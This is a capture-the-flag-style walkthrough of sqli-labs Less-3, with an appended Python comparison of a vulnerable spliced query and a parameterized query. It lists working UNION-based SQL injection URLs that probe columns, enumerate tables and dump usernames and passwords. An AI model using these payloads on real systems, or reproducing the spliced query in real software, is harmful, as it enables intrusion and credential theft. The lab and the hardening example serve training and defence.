The challenge title is itself the hint:
GET type + error-based injection + single quote + parentheses + string
We can roughly guess that the code the developer used looks like:
SELECT LOGIN_NAME, PASSWORD FROM TABLE WHERE ID = ('OUR INPUT HERE')
Constructing the payload directly gives no error; removing the --+ produces an error:
http://sqlilabs/Less-3/?id=-1')--+
After that it is the usual routine:
http://sqlilabs/Less-3/?id=1') order by 3--+
http://sqlilabs/Less-3/?id=1') order by 4--+
http://sqlilabs/Less-3/?id=-1') union select 1,2,3--+
http://sqlilabs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
http://sqlilabs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+
http://sqlilabs/Less-3/?id=-1') union select 1,2,(select group_concat(username,0x3a,password) from users) users--+
The SQL statement in the source code is:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
:D
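As an added illustration (not code from sqli-labs or from the original post), the lab's string-splicing query beside its parameterized counterpart, so the two behaviours can be compared on the same inputs; it assumes an in-memory SQLite table as a stand-in for the MySQL `users` table, and the sample rows are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the lab's `users` table.
# Assumption: SQLite replaces MySQL here; the ('...') quoting pattern is the same.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # Mirrors $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1":
    # the input is spliced into the SQL text, so a quote plus ')' closes the
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT * FROM users WHERE id=('{user_id}') LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened form: the value is bound as a parameter and never parsed as SQL.
    sql = "SELECT * FROM users WHERE id=(?) LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def query_error(conn: sqlite3.Connection, user_id: str):
    # Returns the database error text for the vulnerable query, or None.
    # This is the signal an error-based lab leaks (e.g. ORDER BY out of range);
    # in production such messages should be logged, not returned to the client.
    try:
        lookup_vulnerable(conn, user_id)
    except sqlite3.Error as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"), lookup_safe(db, "1"))
    print(query_error(db, "-1')"))            # unbalanced quote -> syntax error
    print(query_error(db, "1') order by 4-- "))  # column probe -> error text
```

With the page's `-1') union select 1,2,3--` input the spliced query returns the injected row, while the parameterized query simply finds no user with that id.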